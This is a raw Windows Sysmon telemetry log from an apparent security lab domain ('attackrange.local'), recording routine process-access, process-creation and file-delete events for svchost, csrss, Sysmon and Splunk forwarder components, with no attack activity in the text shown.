07:57:32.044{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082636Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:32.044{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082635Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:32.044{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082634Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:32.044{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082633Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:32.044{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082632Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:32.044{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082631Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:32.044{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082630Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:32.044{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082629Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:32.044{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082628Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:32.044{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B3EC-615A-7401-00000000FD01}3912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082627Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:32.044{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B3EC-615A-7401-00000000FD01}3912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082626Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:32.045{2FDD8D40-B3EC-615A-7401-00000000FD01}3912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104778Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:33.928{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBE2D1EFB72BACCFF636ED620ED64E00,SHA256=ED6A98736897C2BEDD579EF0C806B835F1FBCAF8C0057C89EA6430964B2BDFF1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082655Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:33.028{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B3ED-615A-7501-00000000FD01}1576C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082654Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:33.028{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082653Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:33.028{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082652Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:33.028{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082651Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:33.028{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082650Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:33.028{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082649Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:33.028{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082648Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:33.028{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082647Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:33.028{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082646Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:33.028{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082645Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:33.028{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B3ED-615A-7501-00000000FD01}1576C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082644Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:33.028{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B3ED-615A-7501-00000000FD01}1576C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082643Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:33.030{2FDD8D40-B3ED-615A-7501-00000000FD01}1576C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104780Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:34.928{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43C31692284259CC1BB4A2895E0529C2,SHA256=48CCD764742E89FD380DFC9462426F4AABF833B440FE78D4681B5A8C8F9FB63B,IMPHASH=00000000000000000000000000000000falsetrue 